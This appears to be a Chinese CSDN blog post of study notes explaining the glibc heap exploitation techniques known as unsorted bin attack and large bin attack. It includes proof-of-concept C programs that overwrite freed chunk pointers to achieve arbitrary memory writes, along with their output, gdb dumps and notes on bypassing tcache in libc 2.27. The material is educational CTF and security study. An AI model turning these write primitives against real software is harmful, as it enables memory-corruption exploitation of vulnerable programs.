【堆漏洞 - Unsorted bin/ Large bin Attack】

于 2023-04-06 20:03:06 发布
阅读量229 收藏
点赞数
分类专栏: Pwn 文章标签: 系统安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52343643/article/details/126748276
版权

Unsorted bin Attack

Unsorted bin 的可能发生场景

  1. 当一个较大的 chunk 被分割成两半后,如果剩下的部分大于 MINSIZE,就会被放到 unsorted bin 中。
  2. 释放一个不属于 fast bin 的 chunk,并且该 chunk 不和 top chunk 紧邻时,该 chunk 会被首先放到 unsorted bin 中。关于 top chunk 的解释,请参考下面的介绍。
  3. 进行 malloc_consolidate 时,可能会把合并后的 chunk 放到 unsorted bin 中,如果不是和 top chunk 近邻的话。

原理

目的: 修改任意地址的内容
方法:

  1. 修改free small chunk0 ( in unsorted bin) 的 bk,使其指向 target - 0x10 的位置,即 fake chunk 的起始位置.
0x602000:    0x0000000000000000    0x0000000000000091  <-- chunk 1 [be freed]
0x602010:    0x00007ffff7dd1b78    0x00007ffff7dd1b78      <-- fd, bk pointer
# 修改bk后:
0x602000:    0x0000000000000000    0x0000000000000091  <-- chunk 1 [be freed]
0x602010:    0x00007ffff7dd1b78    0x7ffc9b1d61a0      <-- fd, fake bk pointer

0x7fffffffdc50:    0x00007fffffffdd60    0x0000000000400712  <-- target - 0x10
0x7fffffffdc60:    0x0000000000000000    0x0000000000602010  <-- fd、bk
  1. 将 unsorted bin 中的chunk 用malloc 分配回来时,执行unlink,使得 target - 0x10 + 0x10,也就是target的位置变为了 free chunk0->fd
0x7fffffffdc50:    0x00007fffffffdc80    0x0000000000400756  <-- target - 0x10
0x7fffffffdc60:    0x00007ffff7dd1b78    0x0000000000602010      <-- fd = unsortedbin_addr (libc)

关键:unlink操作

victim = unsorted_chunks(av)->bk=p
bck = victim->bk = p->bk = target addr-0x10
unsorted_chunks(av)->bk = bck = target addr-0x10
bck->fd = unsorted_chunks(av);

示例:

#include <stdio.h>
#include <stdlib.h>
int main() {
    unsigned long stack_var = 0;
    fprintf(stderr, "The target we want to rewrite on stack: %p -> %ld\n\n", &stack_var, stack_var);
    unsigned long *p  = malloc(0x80);
    unsigned long *p1 = malloc(0x10);
    fprintf(stderr, "Now, we allocate first small chunk on the heap at: %p\n",p);
    free(p);
    fprintf(stderr, "We free the first chunk now. Its bk pointer point to %p\n", (void*)p[1]);
    p[1] = (unsigned long)(&stack_var - 2);
    fprintf(stderr, "We write it with the target address-0x10: %p\n\n", (void*)p[1]);
    malloc(0x80);  //这里会unlink分配chunk,是stack_var值发生改变的原因
    fprintf(stderr, "Let's malloc again to get the chunk we just free: %p -> %p\n", &stack_var, (void*)stack_var);
}

输出:

$ gcc -g unsorted_bin_attack.c
$ ./a.out
The target we want to rewrite on stack: 0x7ffc9b1d61b0 -> 0

Now, we allocate first small chunk on the heap at: 0x1066010
We free the first chunk now. Its bk pointer point to 0x7f2404cf5b78
We write it with the target address-0x10: 0x7ffc9b1d61a0

Let's malloc again to get the chunk we just free: 0x7ffc9b1d61b0 -> 0x7f2404cf5b78

libc-2.27 中绕过tcache

tcache 的存在
malloc 从 unsorted bin 取 chunk 的时候,如果对应的 tcache bin 还未装满,则会将 unsorted bin 里的 chunk 全部放进对应的 tcache bin,然后再从 tcache bin 中取出。

问题

  • unsorted bin 的 chunk在放进 tcache bin 的这个过程中,malloc 会以为我们的 target address 也是一个 chunk,然而这个 “chunk” 是过不了检查的,将抛出 “memory corruption” 的错误
  • 需要对应 tcache bin 的 counts 域不小于 tcache_count(默认为7),但如果 counts 不为 0,说明 tcache bin 里是有 chunk 的,那么 malloc 的时候会直接从 tcache bin 里取出

解决
利用 tcache poisoning,将 counts 修改成了 0xff,于是在进行到下面这里时就会进入 else 分支,直接取出 chunk 并返回:

#if USE_TCACHE
          /* Fill cache first, return to user only if cache fills.
         We may return one of these chunks later.  */
          if (tcache_nb
          && tcache->counts[tc_idx] < mp_.tcache_count)
        {
          tcache_put (victim, tc_idx);
          return_cached = 1;
          continue;
        }
          else
        {
#endif
              check_malloced_chunk (av, victim, nb);
              void *p = chunk2mem (victim);
              alloc_perturb (p, bytes);
              return p;

Large bin Attack

利用背景

在 malloc 时,会遍历 unsorted bin,若无法 exact-fit 分配或不满足切割分配的条件,就会将该 chunk 置入相应的 bin 中。

版本限制

libc 2.23
libc 2.29及以下

fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;

unsorted chunk 小于链表中最小的 chunk 的时候会执行前一句,反之执行后一句。

libc 2.30
使 unsorted chunk 大于链表中最小的 chunk 时的利用失效,必须使 unsorted chunk 小于链表中最小的 chunk。

victim->bk_nextsize->fd_nextsize = victim;

利用目的

修改任意地址的值,常常作为其他漏洞利用的前奏,例如在 fastbin attack 中用于修改全局变量 global_max_fast 为一个很大的值

示例

#include<stdio.h>
#include<stdlib.h>
int main() {
    unsigned long stack_var1 = 0;
    unsigned long stack_var2 = 0;
    fprintf(stderr, "The targets we want to rewrite on stack:\n");
    fprintf(stderr, "stack_var1 (%p): %ld\n", &stack_var1, stack_var1);
    fprintf(stderr, "stack_var2 (%p): %ld\n\n", &stack_var2, stack_var2);
    unsigned long *p1 = malloc(0x100);
    fprintf(stderr, "Now, we allocate the first chunk: %p\n", p1 - 2);
    malloc(0x10);
    unsigned long *p2 = malloc(0x400);
    fprintf(stderr, "Then, we allocate the second chunk(large chunk): %p\n", p2 - 2);
    malloc(0x10);
    unsigned long *p3 = malloc(0x400);
    fprintf(stderr, "Finally, we allocate the third chunk(large chunk): %p\n\n", p3 - 2);
    malloc(0x10);
    // deal with tcache - libc-2.26
    // int *a[10], *b[10], i;
    // for (i = 0; i < 7; i++) {
    //     a[i] = malloc(0x100);
    //     b[i] = malloc(0x400);
    // }
    // for (i = 0; i < 7; i++) {
    //     free(a[i]);
    //     free(b[i]);
    // }
    free(p1);
    free(p2);
    fprintf(stderr, "Now, We free the first and the second chunks now and they will be inserted in the unsorted bin\n");
    malloc(0x30);
    fprintf(stderr, "Then, we allocate a chunk and the freed second chunk will be moved into large bin freelist\n\n");
    p2[-1] = 0x3f1;
    p2[0] = 0;
    p2[2] = 0;
    p2[1] = (unsigned long)(&stack_var1 - 2);
    p2[3] = (unsigned long)(&stack_var2 - 4);
    fprintf(stderr, "Now we use a vulnerability to overwrite the freed second chunk\n\n");
    free(p3);
    malloc(0x30);
    fprintf(stderr, "Finally, we free the third chunk and malloc again, targets should have already been rewritten:\n");
    fprintf(stderr, "stack_var1 (%p): %p\n", &stack_var1, (void *)stack_var1);
    fprintf(stderr, "stack_var2 (%p): %p\n", &stack_var2, (void *)stack_var2);
}

$ gcc -g large_bin_attack.c
$ ./a.out 
The targets we want to rewrite on stack:
stack_var1 (0x7fffffffdeb0): 0
stack_var2 (0x7fffffffdeb8): 0
Now, we allocate the first chunk: 0x555555757000
Then, we allocate the second chunk(large chunk): 0x555555757130
Finally, we allocate the third chunk(large chunk): 0x555555757560
Now, We free the first and the second chunks now and they will be inserted in the unsorted bin
Then, we allocate a chunk and the freed second chunk will be moved into large bin freelist
Now we use a vulnerability to overwrite the freed second chunk
Finally, we free the third chunk and malloc again, targets should have already been rewritten:
stack_var1 (0x7fffffffdeb0): 0x555555757560
stack_var2 (0x7fffffffdeb8): 0x555555757560

重点在于如果存在某个漏洞,我们可以对p2进行修改

gef➤  x/8gx p2-2
0x555555757130:    0x0000000000000000    0x00000000000003f1  <-- fake p2 [be freed]
0x555555757140:    0x0000000000000000    0x00007fffffffde60      <-- bk
0x555555757150:    0x0000000000000000    0x00007fffffffde58      <-- bk_nextsize
0x555555757160:    0x0000000000000000    0x0000000000000000

由于在p3放入large bin的时候有两句 bck->fd = victim;victim->bk_nextsize->fd_nextsize = victim;实现了在栈stack_var1和stack_var2处写入了victim。

annEleven
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hwb_2019_mergeheap
fayinq的博客
03-22 252
hwb_2019_mergeheap 又是一道好题,很喜欢,但是也证明了我很菜。 全开 函数分析: main(): ADD(): Show(): Del(): Merge(): 首先看到add函数里面,第一眼看过去没有问题的,如果说超过预输入长度,就直接跳过,但是如果等于输入长度,末尾就不会置0。 然后是Show函数,show函数使用的是puts函数,puts函数就可能用来泄露libc或者是main_arena的地址或者是其他的东西 Del函数比较严谨,没有野指针,也没有Double_Free
BUUCTF-PWN刷题记录-12
weixin_44145820的博客
04-23 655
ciscn_2019_sw_1 一道思路比较独特的格式化字符串漏洞题目 main函数中只有一次利用漏洞的机会 有system的got表项 一个可行思路是把printf的GOT改为system@plt,然后输入/bin/sh,但是考虑到只有一次机会就比较困难 所以我们需要一个能让main多次执行的办法 这时我们只要把main的地址填入finit_array就能无限循环main函数了 简单介绍一...
Smallest-Difference-In-Unsorted-Arrays
04-20
最小差异的未排序数组 用Java实现
二进制安全之——堆相关漏洞
PICACHU+++的博客
10-10 2190
主要是指用户动态申请的内存(如:调用malloc,alloc,alloca,new等函数)。glibc malloc源码中有三种最基本的堆块数据结构,分别是heap_info,malloc_state,malloc_chunk。
Unlink
kelxLZ的博客
07-03 1543
Author:ZERO-A-ONE Date:2021-07-03 一、unlink的原理 简介:俗称脱链,就是将链表头处的free堆块unsorted bin中脱离出来然后和物理地址相邻的新free的堆块合并成大堆块(向前合并或者向后合并),再放入到unsorted bin中 危害原理:通过伪造free状态的fake_chunk,伪造fd指针和bk指针,通过绕过unlink的检测实现unlink,unlink就会往p所在的位置写入p-0x18,从而实现任意地址写的漏洞 漏洞产生原因:off.
LCTF 2018 pwn easy_heap
hanabi_sh
11-04 712
LCTF 2018 pwn easy_heap,off-by-one,null-byte-overflow
glibc-2.29 large bin attack 原理
qq_23066945的博客
11-14 1030
glibc-2.29 large bin attack 原理 原创: 星盟安全团队 星盟安全 该方法并非笔者发现,而是阅读 balsn 的 writeup 时分析而得到的,这里介绍一下这种攻击方法。 unsorted bin attack 在介绍新的攻击技术之前,先来缅怀一下 unsorted bin attack , 由于 glibc-2.29 新上的保护措施,使得 unsorted bin ...
house of pig 攻击手法详解
weixin_46483787的博客
02-03 1519
在这里学习一下学长提出来的一种攻击手段,适用与libc-2.31及以上版本,本质上是通过 libc2.31 下的 largebin attack以及 FILE 结构利用,来配合 libc2.31 下的 tcache stashing unlink attack 进行组合利用的方法。主要适用于程序中仅有 calloc 函数来申请 chunk,而没有调用 malloc 函数的情况。
漏洞挖掘中last remainder的深度剖析
董哥的黑板报
07-30 2500
一、什么是last remainder 如果在bins链中存在freechunk时,当我们去malloc的时候,malloc的请求大小比freechunk的大小小,那么arena就会切割这个freechunk给malloc使用,那么切割之后剩余的chunk就被称为“last remainder” 当产生last remainder之后,表示arena的malloc_state结构体中的last...
c# 结构体 4字节对齐_二进制安全之堆溢出(系列)——堆基础 & 结构(二)...
weixin_39936380的博客
10-27 209
哈喽啊这里是二进制安全之堆溢出(系列)第二期“堆基础 & 结构”第二节!!话不多说,直接上干货!微观结构函数执行流程void *malloc (size_t bytes) void *__libc_malloc (size_t bytes) //对于_int_malloc做简单封装 __malloc_hook //类似于虚函数,派生接口,指定一个malloc的方式 _int_mall...
javalruleetcode-leetcode-unsorted:leetcode未排序
06-29
java lru leetcode 力码 # 标题 解决方案 运行 22 31 1 毫秒 42 1 毫秒 46 2 毫秒 47 1 毫秒 56 5 毫秒 93 11 毫秒 103 1 毫秒 124 1 毫秒 128 6 毫秒 146 12 毫秒 150 5 毫秒 153 0 毫秒 199 ...毫秒
Unsorted-Notes:在这里放下随机笔记
04-05
指数目录第1章-好零件第2章-语法第3章-对象第四章-功能第5章-继承第6章-数组第7章-正则表达式第8章-方法第9章-风格第10章-美丽的功能附录A-糟糕的部分附录B-不良零件附录C-JSLint第1章-好零件大多数编程语言包含好的...
pwn学习总结(八)—— 堆(持续更新)
01-07
pwn学习总结(八)—— 堆(持续更新)前言chunk使用中(分配后)空闲中(释放后)堆块大小空间复用binsfastbin利用思路unsorted binsmall bin 前言 学习自《glibc内存管理ptmalloc源代码分析》庄明强 著 部分资料...
heap-viewer:一个IDA Pro插件,用于检查glibc堆,专注于漏洞利用开发
04-13
= 2.29(x86,x64)特征堆跟踪器(malloc / free / calloc / realloc) 检测重叠和双重释放使用可视化Malloc块信息块编辑器多区域信息(块,顶部,末尾) 垃圾桶信息(fastbins,unsortedbin,smallbins y largebins...
malloc和free
yejing's utopia
01-13 3623
昨天看见一位同学分享面试经历。 中间有这么一句话:”一是Java的内存分配原理与C/C++不同,C/C++每次采用malloc或new申请内存时都要进行brk和mmap等系统调用,而系统调用发生在内核空间,每次都要中断进行切换,这需要一定的开销“。 因为这个同学最终拿到了阿里offer,且这个回答得到了面试官”(面试官一直点头表示对我回答的赞同)嗯,看来你对这块的确掌握了“的回应,不知道是这位
linux sort 0x7f,【真题解析】浅析CTF中PWN题型的解题思路
weixin_42500631的博客
05-16 699
原标题:【真题解析】浅析CTF中PWN题型的解题思路前言写一下西湖论剑里的三道pwn题,主要讲一下第二道,因为后面我才发现自己解第二道好像是非预期解。。讲一下自己的解题思路吧。1PWN之一——Story常规基础pwn,格式化字符串+ROP。漏洞:格式化字符串:printf(&s);栈溢出:if( v1 < 0)v1 = -v1;if( v1 > 128)v1 = 1024LL;...
新姿势GET 通过unsorted bin泄露libc地址 与 fastbin double free
哒君的博客
08-01 1908
源文件 GitHub checksec 初步分析 利用方法 用sentence函数分配small bin大小的bin,将其free以后,会归入unsorted bin,而如果只有一个bin的话,其fd与bk都是main_arena + offset,尽管free以后内容会清0,但是search函数中的memcmp却可以通过使v1为\x00来绕过,这样的话就会打印出bin的fb字...
malloc源码分析---4
conansonic的博客
12-09 3081
malloc源码分析—4 上一章分析了_int_malloc中的fastbin、smallbin和部分largebin的处理,本章继续往下看代码, static void * _int_malloc(mstate av, size_t bytes) { ... for (;;) { int iters = 0; while ((victim = un
0ctf-2018 heapstorm2详解
极目楚天舒的博客
05-20 2120
0x01 预备知识堆相关的数据结构通过malloc得到的我们称之为chunk,每一个chunk都有一个chunk头用于管理称之为malloc_chunk,定义如下:/* This struct declaration is misleading (but accurate and necessary). It declares a "view" into memory allowing a...
fast bin、small binunsorted bin large bin的区别与共同点
最新发布
07-15
快速块(fast bin)、小型块(small bin)、未排序块(unsorted bin)和大型块(large bin)是堆管理中不同的内存块分类。它们有一些区别和共同点,如下所示: 区别: 1. 大小范围:快速块是一组固定大小的小块,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值